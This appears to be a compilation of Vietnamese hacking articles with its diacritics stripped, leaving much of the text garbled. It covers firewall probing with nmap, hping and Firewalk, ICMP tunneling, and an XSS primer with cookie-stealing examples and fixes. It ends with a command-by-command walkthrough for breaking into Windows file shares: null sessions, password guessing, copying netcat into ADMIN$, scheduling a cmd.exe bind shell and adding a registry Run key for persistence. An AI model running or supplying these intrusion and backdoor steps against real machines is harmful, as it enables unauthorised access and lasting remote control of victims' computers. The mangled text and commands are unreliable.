Nmap l mt cng c tuyt vi pht hin thng tin bc tng la v chng t i lin tc dng n. Khi nmap qut mt h ch, n khng ch bo cho bn bit cc cng no ang m hoc ng, m cn cho bit cc cng no ang b phong ta. Lng (hoc thiu) thng tin nhn c t mt t qut cng c th cho bit kh nhiu v cu hnh ca bc tng la. Mt cng lc trong nmap biu hin cho mt trong ba ni dung sau:

khng nhn gi tin SYN/ACK no. khng nhn gi tin RST/ACK no. nhn mt thng bo ICMP type 3 (Destination Unreachable ) c mt m 13 (Communication Administratively Prohibited - [RFC1812])

Nmap gom chung c ba iu kin ny v bo co n di dng mt cng " lc." V d, khi qut www.mycompany.com ta nhn hai gi tin ICMP cho bit bc tng la phong ta cc cng 23 v 111 t h thng c th ca chng ta. Code: # nmap -p20, 21, 23, 53, 80, 111 - P0 -vv

www.mycompany.com

Starting nmap V. 2.08 by Fyodor ( fyodor@dhp.com , www.insecure.org/nmap/ )

Initiating TCP connect ( ) scan agains t ( 172.32.12.4 )

Adding TCP port 53 (state Open)

Adding TCP port 111 ( state Firewalled )

Adding TCP port 80 ( state Open)

Adding TCP port 23 ( state Firewalled) .

Interesting ports on ( 172.17.12.4 ) :

port State Protocol Service

23 filtered tcp telnet

53 open tcp domain

80 open tcp http

111 filtered tcp sunrpc

Trng thi "Firewalled", trong kt qu trn y, l kt qu ca vic nhn mt ICMP type 3, m 13 (Admin Prohibited Filter), nh gp trong kt xut tcpdump: Code: 23 : 14 : 01.229743 10.55.2.1 > 172.29.11.207 : icmp : host 172.32.12.4

nreachable - admin prohibited filter

23 : 14 : 01.97 9743 10.55.2.l > 172.29.11.207 : icmp : host 172.32.12.4

nreachable - admin prohibited filter

Lm sao nmap kt hp cc gi tin ny vi cc gi tin ban u, nht l khi chng ch l mt vi trong bin c cc gi tin ang ru rt trn mng? Vng, gi tin ICMP c gi tr li cho my qut s cha ng tt c cc d liu cn thit tm hiu ni dung ang xy ra. Cng ang b phong ta l phn mt byte trong phn u ICMP ti byte 0x41 ( 1 byte), v bc tng la lc gi thng ip s n m trong phn IP ca gi tin ti byte 0x1b (4 byte). Cui cng, mt cng cha lc nmap ch xut hin khi bn qut mt s cng v nhn tr li mt gi tin RST/ACK. Trong trng thi "unfiltered", t qut ca chng ta hoc ang i qua bc tng la v h ch ca chng ta ang bo cho bit n khng lng ch trn cng , hoc bc tng la ang p ng ch v nh la a ch IP ca n vi c RST/ACK c n nh. V d, t qut mt h thng cc b cho ta hai cng cha lc khi n nhn hai gi tin RST/ACK t cng h ch. S kin ny cng c th xy ra vi mt s bc tng la nh Check point (vi quy tc REJECT) khi n p ng ch ang gi tr mt gi tin RST/ACK v nh la a ch IP ngun ca ch. .

Code: # nmap - sS -p1 -300 172.18.20.55

Starting nmap V . 2.08 by Fyodor ( fyodor@dhp.com , www.insecure.org/nmap/ )

Interesting ports on ( 172.18.20.55 ) :

(Not showing ports in state : filtered)

Port State Protocol Service

7 unfiltered tcp echo

53 unfilteres tcp domain

256 open tcp rap

257 open tcp set

258 open tcp yak-chat

Nmap run completed - 1 IP address ( 1 host up ) scanned in 15 seconds

t r gi tin tcpdump kt hp nu cc gi tin RST/ACK nhn.

21 :26 :22.742482 172.18.20.55.258 > 172.29.11.207.39667 : S

415920470 : 1415920470 ( 0 ) ack 3963453111 win 9112 (DF )

(ttl 254, id 50438 )

21 :26 :23.282482 172.18.20.55.53 > 172.29.11.207.39667 :

R 0 : 0 ( 0 ) ack 3963453111 win 0 (DF ) ( ttl 44, id 50439 )

21 :2 6: 24.362482 172.18.20.55.257 > 172.29.111.207.39667 : S

1416174328 : 1416174328 ( 0 ) ack 396345311 win X112

( DF ) ( ttl 254, id 504 0 )

21: 26: 26.282482 172.18.20.55.7 > 17.2.29.11.207.39667 :

R 0 : 0 ( 0 ) ack 3963453111 win 0 ( DF ) ( ttl 44, id 50441)

Cc Bin Php Phng Chng

ngn cn attacker im danh cc ACL b nh tuyn v bc tng la thng qua k thut admin prohibited filter", bn c th v hiu ha kh nng p ng vi gi tin ICMP type 13 ca b nh tuyn. Trn Cisco, bn c th thc hin iu ny bng cch phong ta thit b p ng cc thng ip IP khng th ng n no ip unreachables

5. nh Danh Cng

Mt s bc tng la c mt du n duy nht xut hn di dng mt sri con s phn bit vi cc bc tng la khc. V d, Check Point s hin th mt sri cc con s khi bn ni vi cng qun l SNMP ca chng, TCP 257. Tuy s hin din n thun ca cc cng 256-259 trn mt h thng thng cng l mt du ch bo v s hin din ca Firewall-1 ca Check Point song trcnghim sau y s xc nhn n : Code: [ root@bldg_043]# nc -v -n 192.168.51.1 257

( UNKNOWN) [ 192.168.51.1] 257 ( ? ) open

30000003

[ root@bldg_043 # nc -v -n 172.29.11.19l 257

(UNKNOWN ) [ 172.29.11.191] 257 ( ? ) open

31000000

Cc Bin Php Phng Chng

Pht Hin pht hin tuyn ni ca mt k tn cng vi cc cng ca bn. bn b sung mt s kin tuyn ni trong RealSecure. Theo cc bc sau: 1. Hiu chnh ni quy 2. La tab Connection Events. 3. La nut Add Connection, v in mt mc cho Check Point. 4. La ch ko xung v la nt Add. 5. in dch v v cng, nhp OK. 6. La cng mi, v nhp li OK. 7. Gi y la OK v p dng li ni quy cho ng c.

Phng Chng

ngn cn cc tuyn ni vi cng TCP 257, bn phong ta chng ti cc b nh tuyn thng ngun. Mt Cisco ACL n gin nh di y c th khc t r rt mt n lc ca bn tn cng:

Code:access -list 101 deny tcp any any eq 257 log ! Block Firewall- l scans

III. Qut qua cc bc tng la

ng lo, on ny khng c cung cp cho bn nhc k m mt s k thut ma thut v hiu ha cc bc tng la. Thay v th, ta s tm hiu mt s k thut nhy ma quanh cc bc tng la v thu thp mt s thng tin quan trng v cc l trnh khc nhau xuyn qua v vng quanh chng.

1. hping

hping ca Salvatore Sanfilippo, lm vic bng cch gi cc gi tin TCP n mt cng ch v bo co cc gi tin m n nhn tr li. hping tr v nhiu p ng khc nhau ty theo v s iu kin. Mi gi tin tng phn v ton th c th cung cp mt bc tranh kh r v cc kiu kim sot truy cp ca bc tng la. V d, khi dng hping ta c th pht hln cc gi tin m, b phong ta, th, v loi b.

Trong v d sau y, hping bo co cng 80 ang m v sn sng nhn mt tuyn ni. Ta bit iu ny bi n nhn mt gi tin vi c SA c n nh (mt gi tin SYN/ACK).

Code: # hping www.yourcompany.com -c2 S -p80 -n

HPING www.yourcomapany.com ( eth0 172.30.1.2 0 ) : S set, 40 data bytes 60 bytes from 172.30.1.20 : flags=SA seq=0 ttl=242 id= 65121 win= 64240 time=144.4 ms

Gi y ta bit c mt cng m thng n ch, nhng cha bit ni ca bc tng la. Trong v d k tip, hping bo co nhn mt ICMP unreachable type 13 t 192.168.70.2. Mt ICMP type 13 l mt gi tin lc b ICMP admin ngn cm, thng c gi t mt b nh tuyn lc gi tin. Code: # hping www.yourcompany.com -c2 S -p23 -n

HPING www.yourcompany.com ( eth0 172.30.1.20 ) : S set, 40 data bytes ICMP Unreachable type 13 f rom 192.168.70.2

Gi y n c xc nhn, 192.168.70.2 t hn l bc tng la, v ta bit n ang phong ta cng 23 n ch ca chng ta. Ni cch khc, nu h thng l mt b nh tuyn Cisco n t c mt dng nh di y trong tp tin config: Code: access -list 101 deny tcp any any 23 ! telnet

Trong v d k tip, ta nhn c mt gi tin RST/ACK tr li bo hiu mt trong hai vic:

(1) gi tin lt qua bc tng la v server khng lng ch cng (2) bc tng la thi b gi tin (nh trng hp ca quy tc reject ca Check Point).

Code:# hping 192.168.50.3 -c2 -S -p22 -n

HPING 192.168.50.3 ( eth0 192.168.50.3 ) : S set, 40 data bytes 60 bytes from 192.168.50.3 : flags=RA seq= 0 ttl= 59 id= 0 win= 0 time=0.3 ms

Do nhn gi tin ICMP type 13 trn y, nn ta c th suy ra bc tng la ( 192.168.70.2) ang cho php gi tin i qua bc tng la, nhng server khng lng ch trn cng . Nu bc tng la m bn ang qut qua l Check point, hping s bo co a ch IP ngun ca ch, nhng gi tin thc s ang c gi t NIC bn ngoi ca bc tng la Check Point. im rc ri v Check Point l n s p ng cc h thng bn trong ca n , gi mt p ng v la bp a ch ca ch. Tuy nhin, khi attacker ng mt trong cc iu kin ny trn Internet, chng khng h bit s khc bit bi a ch MAC s khng bao gi chm my ca chng. Cui cng, khi mt bc tng la ang phong to cc gi tin n mt cng, bn thng khng nhn c g tr li. Code:[ root@bldg_04 3 /opt ] # hping 192.168.50.3 -c2 -S -p2 2 -n

HPING 192.168.50.3 ( eth0 192.168.50.3 ) : S set, 40 data K thut hping ny c th c hai ngha: (1) gi tin khng th t n ch v b mt trn ng truyn, hoc (2) c nhiu kh nng hn, mt thit b (t l bc tng la ca chng ta 192.168.70.2 ) b gi tin trn sn di dng mt phn cc quy tc ACL ca n.

Bin Php Phng Chng

Ngn nga mt cuc tn cng hping khng phi l d . Tt nht, ta ch vic phong ta cc thng ip ICMP type 13 ( nh m t trong on phng chng tin trnh qut nmap trn y ).

2. Firewalk

Firewalk l mt cng c nh tin dng, nh mt b qut cng, c dng pht hin cc cng m ng sau mt bc tng la. c vit bi Mike Schiffnlan, cn gi l Route v Dave Goldsmith, trnh tin ch ny s qut mt server xua dng t mt bc tng la v bo co tr li cc quy tc c php n server m khng phi thc t chm n h ch. Firewalk lm vic bng cch kin to cc gi tin vi mt IP TTL c tnh ton kt thc mt chng vt qu bc tng la. V l thuyt, nu gi tin c bc tng la cho php, n s c php i qua v s kt thc nh d kin, suy ra mt thng ip "ICMP TTL expired in transit." Mt khc, nu gi tin b ACL ca bc tng la phong ta, n s b th, v hoc khng c p ng no s c gi, hoc mt gi tin lc b ICMP type 13 admin ngn cm s c gi.

Code:# firewalk -pTCP -S135 -140 10.22.3.1 192.168.1.1

Ramping up hopcounts to binding host . . .

probe : 1 TTL : 1 port 33434 : expired from [exposed.acme.com]

probe : 2 TTL : 2 port 33434 : expired from [rtr.isp.net]

probe : 3 TTL : 3 port 33434 : Bound scan at 3 hops [rtr.isp.net]

port open

port 136 : open

port 137 : open

port 138 : open

port 139 : *

port 140 : open

S c duy nht m chng ta gp khi dng Firewalk l n c th t hn d on, v mt s bc tng la s pht hin gi tin ht hn trc khi kim tra cc ACL ca n v c th gi tr mt gi tin ICMP TTL EXPI#800000. Kt qu l, Firewalk mc nhn tt c cc cng u m.

Bin Php Phng Chng

Bn c th phong ta cc gi tin ICMP TTL EXPI#800000 ti cp giao din bn ngoi, nhng iu ny c th tc ng tiu cc n kh nng vn hnh ca n, v cc clien hp php ang ni s khng bao gi bit iu g xy ra vi tuyn ni ca chng.

IV. Lc gi tin

Cc bc tng la lc gi tin nh Firewall-1 ca Check Point, Cisco PIX, v IOS ca Cisco (vng, Cisco IOS c th c xc lp di dng mt bc tng la) ty thuc vo cc ACL (danh sch kim sot truy cp) hoc cc quy tc xc nh xem lung traffic c c cp quyn truyn vo/ra mng bn trong. a phn, cc ACL ny c sp t k v kh khc phc. Nhng thng thng, bn tnh c gp mt bc tng la c cc ACL t do, cho php vi gi tin i qua tnh trng m. . Cc ACL T Do Cc danh sch kim sot truy cp (ACL) t do thng gp trn cc bc tng la nhiu hn ta tng. Hy xt trng hp c th mt t chc phi cho php ISP thc hin cc t chuyn giao min. Mt ACL t do nh "Cho php tt c mi hot ng t cng ngun 53" c th c s dng thay v cho php hot ng t serverDNS ca ISP vi cng ngun 53 v cng ch 53." Nguy c tn ti cc cu hnh sai ny c th gy tn ph thc s, cho php mt hc c qut nguyn c mng t bn ngoi. Hu ht cc cuc tn cng ny u bt u bng mt k tn cng tin hnh qut mt server ng sau bc tng la v nh la ngun ca n di dng cng 53 (DNS).

Bin Php Phng Chng

Bo m cc quy tc bc tng la gii hn ai c th ni u. V d, nu ISP yu cu kh nng chuyn giao min, th bn phi r rng v cc quy tc ca mnh. Hy yu cu mt a ch IP ngun v m ha cng a ch IP ch (serverDNS bn trong ca bn) theo quy tc m bn ngh ra. Nu ang dng mt bc tng la Checkpoint, bn c th dng quy tc sau y hn ch mt cng ngun 53 (DNS) ch n DNS ca ISP. V d, nu DNS ca ISP l 192.168.66.2 v DNS bn trong ca bn l 172.30.140.1, bn c th dng quy tc di y: Ngun gc ch Dch v Hnh ng Du vt 192.168.66.2 172.30. 140.1 domain-tcp Accept Short

V. Tunneling ICMP v UDP

Tunneling ICMP l kh nng ng khung d liu thc trong mt phn u ICMP. Nhiu b nh tuyn v bc tng la cho php ICMP ECHO, ICMP ECHO REPLY, v cc gi tin UDP m qung i qua, v nh vy s d b tn thng trc kiu tn cng ny. Cng nh ch yu Checkpoint DNS, cuc tn cng Tunneling ICMP v UDP da trn mt h thng b xm phm ng sau bc tng la. Jeremy Rauch v Mike D. Shiffman p dng khi nim Tunneling vo thc t v to cc cng c khai thc n : loki v lokid (clien v server) -xem http://www.phrack.com/search.phtml?view&article=p49-6. Nu chy cng c serverlokid trn mt h thng ng sau bc tng la cho php ICMP ECHO v ECHO REPLY, bn cho php attacker chy cng c clien (loki), ng khung mi lnh gi i trong cc gi tin ICMP ECHO n server(lokid). cng c lokid s tho cc lnh, chy cc lnh cc b , v ng khung kt xut ca cc lnh trong cc gi tin ICMP ECHO REPLY tr li cho bn tn cng. Dng k thut ny, attacker c th hon ton b qua bc tng la.

Bin Php Phng Chng

ngn cn kiu tn cng ny, bn v hiu ha kh nng truy cp ICMP thng qua bc tng la hoc cung cp kh nng truy cp kim sot chi tit trn lung lu thng ICMP. V d, Cisco ACL di y s v hiu ha ton b lung lu thng ICMP pha ngoi mng con 172.29.10.0 (DMZ) v cc mc tiu iu hnh:

Code: access - list 101 permit icmp any 172.29.10.0 0.255.255.255 8 ! echo

access - list 101 permit icmp any 172.29.10.0 0.255.255.255 0 ! echo- reply

access - list 102 deny ip any any log ! deny and log all else

Cnh gic: nu ISP theo d thi gian hot ng ca h thng bn ng sau bc tng la ca bn vi cc ping ICMP (hon ton khng nn!), th cc ACL ny s ph v chc nng trng yu ca chng. Hy lin h vi ISP khm ph xem h c dng cc ping ICMP kim chng trn cc h thng ca bn hay khng.

Tm Tt

Trong thc t mt bc tng la c cu hnh k c th cng kh vt qua. Nhng dng cc cng c thu thp thng tin nh traceroute, hping, v nmap, attacker c th pht hin (hoc ch t suy ra) cc l trnh truy cp thng qua b nh tuyn v bc tng la cng nh kiu bc tng la m bn ang dng. Nhiu ch yu hin hnh l do cu hnh sai trong bc tng la hoc thiu s gim st cp iu hnh, nhng du th no, kt qu c th dn n mt cuc tn cng i ha nu c khai thc. Mt s im yu c th tn ti trong cc h u nhim ln cc bc tng la lc gi tin, bao gm cc kiu ng nhp web, telnet, v localhost khng thm nh quyn. a phn, c th p dng cc bin php phng chng c th ngn cm khai thc ch yu ny, v trong vi trng hp ch c th ng k thut pht hin. Nhiu ngi tin rng tng lai tt yu ca cc bc tng la s l mt dng lai ghp gia u nhim ng dng v cng ngh lc gi tin hu trng [stateful] s cung cp vi k thut hn ch kh nng cu hnh sai. Cc tnh nng phn ng cng s l mt phn ca bc tng la th h k tip. NAI thc thi mt dng nh vy vi kin trc Active Security. Nh , ngay khi pht hin cuc xm phm, cc thay i c thit k sn s t ng khi pht v p dng cho bc tng la b nh hng. V d, nu mt IDS c th pht hin tin trnh Tunneling ICMP, sn phm c th hng bc tng la ng cc yu cu ICMP ECHO vo trong bc tng la. Bi cnh nh vy lun l c hi cho mt cuc tn cng DDoS; l l do ti sao lun cn c mt cc nhn vin bo mt kinh nghim. ------------------------------------------------------------------------------------------------------------------- Theo: Hacking exposed

Gii thiu s lc v k thut tn cng CROSS-SITE SCRIPTING

Ngun t: HVA Online Tc gi: Luke

# # Gii thiu s lc v k thut tn cng CROSS-SITE SCRIPTING # Vietnamese Version - Luke - HVA Copyrighted # 07/27/03 #

Cross-Site Scripting (XSS) l mt trong nhng k thut tn cng ph bin nht hin nay, ng thi n cng l mt trong nhng vn bo mt quan trng i vi cc nh pht trin web v c nhng ngi s dng web. Bt k mt website no cho php ngi s dng ng thng tin m khng c s kim tra cht ch cc on m nguy him th u c th tim n cc li XSS. Trong bi vit ny ti s cp s lc ti XSS vi mt s kinh nghim ca ti qua k thut tn cng ny.

1. XSS l g ? Cross-Site Scripting hay cn c gi tt l XSS (thay v gi tt l CSS trnh nhm ln vi CSS-Cascading Style Sheet ca HTML) l mt k thut tn cng bng cch chn vo cc website ng (ASP, PHP, CGI, JSP ...) nhng th HTML hay nhng on m script nguy him c th gy nguy hi cho nhng ngi s dng khc. Trong , nhng on m nguy him c chn vo hu ht c vit bng cc Client-Site Script nh JavaScript, JScript, DHTML v cng c th l c cc th HTML. K thut tn cng XSS nhanh chng tr thnh mt trong nhng li ph bin nht ca Web Applications v mi e do ca chng i vi ngi s dng ngy cng ln. Ngi chin thng trong cuc thi eWeek OpenHack 2002 l ngi tm ra 2 XSS mi. Phi chng mi nguy him t XSS ngy cng c mi ngi ch hn.

2. XSS hot ng nh th no ? V c bn XSS cng nh SQL Injection hay Source Injection, n cng l cc yu cu (request) c gi t cc my client ti server nhm chn vo cc thng tin vt qu tm kim sot ca server. N c th l mt request c gi t cc form d liu hoc cng c th ch l cc URL nh l

Code:http://www.example.com/search.cgi?query=alert('XSS was found !');

V rt c th trnh duyt ca bn s hin ln mt thng bo "XSS was found !". Cc on m trong th khng h b gii hn bi chng hon ton c th thay th bng mt file ngun trn mt server khc thng qua thuc tnh src ca th . Cng chnh v l m chng ta cha th lng ht c nguy him ca cc li XSS. Nhng nu nh cc k thut tn cng khc c th lm thay i c d liu ngun ca web server (m ngun, cu trc, c s d liu) th XSS ch gy tn hi i vi website pha client m nn nhn trc tip l nhng ngi khch duyt site . Tt nhin i khi cc hacker cng s dng k thut ny deface cc website nhng vn ch tn cng vo b mt ca website. Tht vy, XSS l nhng Client-Side Script, nhng on m ny s ch chy bi trnh duyt pha client do XSS khng lm nh hng n h thng website nm trn server. Mc tiu tn cng ca XSS khng ai khc chnh l nhng ngi s dng khc ca website, khi h v tnh vo cc trang c cha cc on m nguy him do cc hacker li h c th b chuyn ti cc website khc, t li homepage, hay nng hn l mt mt khu, mt cookie thm ch my tnh bn c th s b ci cc loi virus, backdoor, worm ..

3. Cnh gic vi XSS C l khng cn lit k nhng nguy him ca XSS, nhng trn thc t nu bn c mt cht hiu bit v XSS bn s khng cn phi s chng na. Tht vy bn hon ton c th trnh khi vic b tn cng bi nhng li XSS nu hiu k v n. Cc th HTML u c th l cng c cho cc cuc tn cng bi k thut XSS, trong 2 th IMG v IFRAME c th cho php trnh duyt ca bn load thm cc website khc khi cc lnh HTML c hin th. V d nh BadTrans Worm mt loi worm s dng th IFRAME ly lan trong cc h thng c s dng Outlook hay Outlook Express:

Code:--====_ABC1234567890DEF_====

Content-Type: multipart/alternative;

boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====

Content-Type: text/html;

charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====

Content-Type: audio/x-wav;

name="filename.ext.ext"

Content-Transfer-Encoding: base64

Content-ID:

i khi ang c th bn b chuyn sang mt website khc, bn c ngh rng bn c th mt mt khu. Trc y, hng lot cc hp th ca Yahoo b mt mt khu hay b c trm th m khng r nguyn nhn. C l khi cc bn m cc bc th m khng h cnh gic vi XSS, u phi ch cc file nh km mi c th gy nguy him cho bn. Ch cn vi mt on m HTML gi trong th bn hon ton b mt cookie ca mnh:

CODE

Vy l khi bn nhn th, v nu bn v tnh a con chut qua bc nh gi km th cng c ngha l bn b ly mt cookie. V vi cookie ly c, cc hacker c th d dng login hm th ca bn m khng cn bit mt khu ca bn. Thc s ti cng rt bt ng khi tm thy rng Yahoo khi ngn c hu ht cc mi e do t cc th HTML li b qua th IMG. Tuy nhin cho ti ngy 12/7/2003 Yahoo kp thi v l hng nghim trng ny, nhng khng phi v vy m bn mt cnh gic vi nhng "li" ca website. Nu nh bn gp mt lin kt c dng

http://example.com/search.cgi?query=alert(document.cookie)

chc chn bn s phi xem xt k trc khi click vo. C th l s tt JavaScript cho trnh duyt ca bn trc khi click vo hay t nht cng c mt cht cnh gic. Nhng nu bn gp mt lin kt nh th ny th sao :

Code:http://example.com/search.cgi?%71%75%65%61%72%79%3D%3C%73%63%72%69%70%74%3E%61%6C%65%61%72%74%28%64%63%75%6D%65%6E%6C%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E]http://example.com/search.cgi?%71%75%65%61...%72%69%70%74%3E

thc cht chnh l lin kt ban u nhng ch khc n c m ho. Mt phn k t ca lin kt c thay th bi m HEX ca n, tt nhin trnh duyt ca bn vn hiu a ch thc s l g. Bi vy bn c th s gp phi cc on m nguy him nu nh bn mt cnh gic vi XSS. Tt nhin cn rt nhiu nhng kiu tn cng khc, trong c nhng kiu c tm ra c nhng kiu cha lng ht c, nhng trong khun kh bi vit ny ti hi vng vi mt vi v d va ri, cc bn cng hiu phn no v XSS.

4. Pht hin XSS bng cch no ? Nu nh cc bn s dng cc m ngun ca cc chng trnh c sn bn c th tham kho danh sch cc l hng ca chng trnh bn trn cc trang web cha cc thng tin v bo mt nh securityfocus.com, securiteam.com,... Tuy nhin nu cc website c t vit m ngun th bn khng th p dng phng php trn. Trong trng hp ny bn cn n cc chng trnh scanner t ng. Nu nh bn s dng trong mi trng Windows bn c th dng N-Stealth hay AppScan, l nhng chng trnh scan kh tuyt, bn khng ch kim tra c cc li XSS m n cn cho php bn kim tra cc li khc trong Website , Server . Tt nhin u phi lc no bn cng cn kim tra tt c, nu nh bn ch mun kim tra cc li XSS c trong website, bn ch cn s dng screamingCSS. l mt Perl Script s m cc kt ni ti website (s dng Perl's socket) kim tra cc li XSS ca bn. Hn na bn c th s dng n trong c mi trng Unix ln Windows.

5. Ngn nga XSS nh th no ? Ngi ta khng lng ht c mc nguy him ca XSS nhng cng khng qu kh khn ngn nga XSS. C rt nhiu cch c th gii quyt vn ny. OWASP (The Open Web Application Standard Project) ni rng c th xy dng cc website bo mt cao, i vi cc d liu ca ngi s dng bn nn + Ch chp nhn nhng d liu hp l. + T chi nhn cc d liu hng. + Lin tc kim tra v thanh lc s liu. Tuy nhin trn thc t, mt s trng hp bn phi chp nhn mi loi d liu hay khng c mt b lc ph hp. Chnh v vy bn phi c nhng cch ring gii quyt. Mt trong nhng cch hay s dng l bn m ho cc k t c bit trc khi in ra website, nht l nhng g c th gy nguy him cho ngi s dng. Trong trng hp ny th s c i thnh . Nh vy n s vn c in ra mn hnh m khng h gy nguy him cho ngi s dng. Ti ly v d vi script search.cgi vi m ngun l

Code:#!/usr/bin/perl

use CGI;

my $cgi = CGI->new();

my $query = $cgi->param('query');

print $cgi->header();

print "You entered $query";

y hon ton l mt script c li bi v n in ra trc tip d liu c nhp vo. D nhin l khi in ra, n s in ra di dng on m HTML, nh th n khng ch khng in ra chnh xc nhng d liu vo mt cch trc quan m cn c tim n li XSS. Nh ni trn, c th gii quyt vn ny, chng ta c th m ho cc k t c bit ca HTML vi hm HTML::Entities::encode(). Nh vy ta c th c mt m ngun hon ho hn nh sau:

Code:#!/usr/bin/perl

use CGI;

use HTML::Entities;

my $cgi = CGI->new();

my $text = $cgi->param('text');

print $cgi->header();

print "You entered ", HTML::Entities::encode($text);

Tt nhin vi phng php ny bn cng c th p dng i vi cc ngn ng Web Application khc (ASP, PHP...). kim tra vic lc v m ho d liu trc khi in ra, cc bn c th dng mt chng trnh c vit bng ngn nh PHP, c bit n c thit k phng chng cc li XSS. Bn c th ly m ngun chng trnh t http://www.mricon.com/html/phpfilter.html Lc v m ho cc d liu cho vn l cch tt nht chng XSS nhng nu bn ang s dng mod_perl trn Apache Server th bn c th dng ngay module Apache::TaintRequest. Khi m ngun chng trnh s c dng :

Code:use Apache::TaintRequest;

my $apr = Apache::TaintRequest->new(Apache->request);

my $text = $apr->param('text');

$r->content_type("text/html");

$r->send_http_header;

$text =~ s/[^A-Za-z0-9 ]//;

$r->print("You entered ", $text);

K thut XSS c m t ln u tin cch y 2 nm v hu ht cc kh nng tim n ca k thut ny c bit n. Tuy nhin chng ta mi ch khc phc c mt phn ca n. Khng phi v tnh m Yahoo Mail li st mt li XSS trong b lc ca mnh. Mt phng php ti u vn cn ang pha trc.

Hacking PC resource share - Hng i v gii php

By gi chng ta cng bt u suy ngh nhng hng phi i. Khi bn Online ( tc kt ni vo Internet) bn s c ISP gn cho mt IP no . Vy Hacker c bit c IP ca bn khng? Cu tr li l c ( nu Hacker giao tip vi bn,c ngha l my ca bn v my ca hacker c s kt ni, ng ngha vi vic trao i cc packet,t cc packet c th bit c a chi IP ngun)

Khi bit IP ca bn liu hacker c th hack vo my tnh ca bn khng? Cu tr li l hon ton c th. Vy hacker lm nh th no Hack?

Hacking thng qua resource share:

Hacker c th dng cc tool hack t ng v d nh : ent3,legion ( nhng bn cht ca cc cng c ny l thc hin cc bc m ti s ni di y 1 cch t ng,chnh v vy vic dng cc tool ny l mt cch kh c chui ) Trc tin Hacker s kim tra nhng ti nguyn c chia s trn my tnh ca bn. Ch bng vi dng lnh n gin trn comand line:

CODE

[C:\>Net view \\x.x.x.x ( vi x.x.x.x l a ch IP ca bn m hacker bit )

Shared resources at \\x.x.x.x

Share name Type Used as Comment ------------------------------------------------------------------------------- C Disk PRJA3 Disk The command completed successfully. C:\>

Vi Windows 95 & 98 th kh nng b hack Cao hn nhiu so vi Windows NT,2000,XP ( v win 95,98 dng nh dng FAT&FAT32 c bo mt thp hn nhiu so vi NTFS)

i vi hai loi Windows ny (95,98) Hacker thm ch khng cn ly Administrator cng c th lm c tt c ( bn c tin khng ?). Khuyn co : khng nn dng 2 loi win ny v qu li thi v c th b hack bt c lc no.

Sau khi lit k cc a,folder share bc tip theo ca hacker l phi truy cp vo cc a,folder ly d liu (y cng l mc ch ca hacker).Hacker s nh s a ,th mc share truy cp vo. Cng bng command line:

CODE

C:\> net use z: \\x.x.x.x \share The command completed successfully

.

Chng l hack n gian vy sao ? Khng , khng h n gin nh th bi v my ca victim c t password ( vic nh s cn phi bit username & password ).Th l Hacker p tay ? khng hacker khng bao gi chu p tay,hacker s c gng ly username & password Ly Username :

CODE

C

:\> Nbtstat A x.x.x.x

NetBIOS Remote Machine Name Table

Name Type Status --------------------------------------------- ADMIN UNIQUE Registered BODY GROUP Registered ADMIN f UNIQUE Registered BODY GROUP Registered BODY UNIQUE Registered ..__MSBROWSE__. GROUP Registered

MAC Address = 00-08-A1-5B-E3-8C

Vy my x.x.x.x s c 2 username l : ADMIN va BODY Khi c username hacker s tin hnh Crack password ( da vo cc tool nh : pqwak,xIntruder) Hoc Hacker s tin hnh to ra mt t in ( da vo kh nng phn on ca hacker ) tn l : pass.txt

CODE

ADMIN 123456 ADMIN 123456 BODY BODY

Sau hacker crack bang lnh : [/CODE] Cng c th to Userlist.txt v passlist.txt ri dng lnh:

CODE

C:\> FOR /F %i IN (1,1,254) DO nat u userlist.txt p passlist.txt x.x.x.x.%I>>output.txt

i vi Win 2000,XP hacker s khng l g nu khng phi administrator chnh v vy hacker bng mi gi s ly cho c administrator. nu ly c admin th vic cn li th ch hacker nh ot. Khuyn co : khng nn share g ht ( trong trng hp buc phi share th nn t password phc tp 1 cht ) Gi s rng my ca Victim khng share. Vy hacker lm sao ?

Trong trng hp ny hacker s on user & pass (c th dng cch trn hoc dung cc tool nh: user2sid/sid2user,dumpACL,SMBGrind) sau kt ni ti IPC$ ( mc nh share ca windows)

CODE

C:\> net use \\x.x.x.x\IPC$ password /user:administrator The command completed successfully.

Trong trng hp khng th on c user & pass hacker c th thit lp mt Null session ti my victim:

CODE

C:\> net use \\x.x.x.x\IPC$ /user: The command completed successfully

V ri nu victim permission khng ng s c nhng hu qu khn lng.

khuyn co : V hiu ho NetBios ( Bm vo My Network Places chn Local Area Connetion, chn TCP/ IP sau bm vo propperties chn Advandce, chn WINS v bm vo Disable NetBIOS over TCP / IP), Dng firewall chn 1 s port khng cn thit , kho ti khon sau 1 s ln ng nhp tht bi .

Tin y cng ni thm v iu khin t xa ( v c nhiu bn t nhp c vo ri m khng bit phi lm sao )

Gi s rng bn c username,password ca admin ca my victim ri: gi thit lp 1 phin lm vic:

CODE

C:\> net use \\x.x.x.x\IPC$ password /user:administrator The command completed successfully.

Sau ta cn copy backdoor iu khin my victim c rt nhiu loi backdoor nhng ti thy hn c vn l : netcat ( nc) chp nc vo my victim

CODE

C

:\>copy nc.exe \\x.x.x.x\ADMIN$\nc.exe The command completed successfully. 1 file copies

Chy service Schedule trn my victim ( c service ny mi thc thi c cc file trn my victim, mc inh khi ci win s chy service ny)

CODE

C:\> sc \\x.x.x.x start schedule service_name : schedule

By gi kim tra gi trn my victim

CODE

C:\> net time \\x.x.x.x

Current time at \\10.0.0.31 is 6/29/2005 4:50 AM

The command completed successfully.

By gi chy netcat ch n lng nghe cng 111:

CODE

C:\>AT \\x.x.x.x 4:55 /interactive c:\windows\nc.exe L d p111 e cmd.exe

Added a new job with job ID = 1

i n 4:55 ri chy th nc.exe

CODE

C:\>nc nvv x.x.x.x 111

(UNKNOWN) [x.x.x.x] 111 (?) open Microsoft Windows XP [Version 5.1.2600] Copyright 1985-2001 Microsoft Corp.

C:\windows>

By gi lm g th tu nha ( nhng ng c ph hoi ngi ta nhe) Vn l lm sao cho nhng ln sau victim bt my tnh ln netcat t ng chy v lng nghe mnh lnh ca ta? Bn c th cho netcat khi ng cng windows. "moi" file netcat.reg (dng notepad v save li thnh .reg) c ni dung nh sau:

CODE

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe"

Sau copy sang my victim v chy nha! Hy vng mi ngi ng ph hoi nha ! Thn

Firewall + phng php ca Hacker + cch phng chng

